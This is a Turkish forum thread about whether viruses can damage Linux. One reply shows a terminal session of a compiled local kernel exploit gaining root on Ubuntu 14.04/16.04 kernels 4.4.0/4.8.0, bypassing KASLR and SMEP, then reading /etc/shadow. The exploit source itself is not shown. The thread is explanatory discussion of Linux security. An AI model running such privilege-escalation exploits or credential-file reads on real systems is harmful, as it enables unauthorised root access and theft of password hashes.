Linux ve Virüsler

Root yetkisi verilen dosyalar (sh, py falan galiba) ile bilgisayarı bozuyor galiba. Ya da başka bir şey.
O zaman bile işin ucu yine bir şekilde kullanıcıya çıkıyor. Sistemde güvenlik zaafiyeti olmadığı sürece kernel panic'e neden olacak kadar güçlü bir virüsün sisteme sızması çok çok zor. Bir şekilde kullanıcı sistem klasörlerine chmod ile okuma, yazma, çalıştırma yetkisi verip zararlı scripte de aynı ayrıcalıkları verip bir de onu çalıştırırsa mümkün olur ancak.
Root yetkisi almak için exploitlerden örnek vereyim,
Kernel 4.4.0 veya 4.8.0 kullanan Ubuntu 14.04/16.04 (veya Ubuntu tabanlı diğer dağıtımlar), Linux Mint 17/18 ve Zorin OS 12.1 sürümlerinde güvenlik zaafiyetinden yararlanıp root yetkisi alınabiliyordu.

Şu şekilde:
Bash:
user@ubuntu:~$ uname -a
Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu:~$ whoami
user
user@ubuntu:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
user@ubuntu:~$ gcc xx1.c -o xx1
user@ubuntu:~$ ./xx1
[.] starting
[.] checking kernel version
[.] kernel version '4.8.0-58-generic' detected
[~] done, version looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[~] done, kernel text:   ffffffffae400000
[.] commit_creds:        ffffffffae4a5d20
[.] prepare_kernel_cred: ffffffffae4a6110
[.] SMEP bypass enabled, mmapping fake stack
[~] done, fake stack mmapped
[.] executing payload ffffffffae40008d
[~] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@ubuntu:/home/user# whoami
root
root@ubuntu:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/user# cat /etc/shadow
root:!:17246:0:99999:7:::
daemon:*:17212:0:99999:7:::
bin:*:17212:0:99999:7:::
sys:*:17212:0:99999:7:::
 
Anladım. Wikipedia, güvenliği sığ olan Linux'larlardan bahsetmişti. Herhalde ondan.
 
Bu siteyi kullanmak için çerezler gereklidir. Siteyi kullanmaya devam etmek için çerezleri kabul etmelisiniz. Daha Fazlasını Öğren.…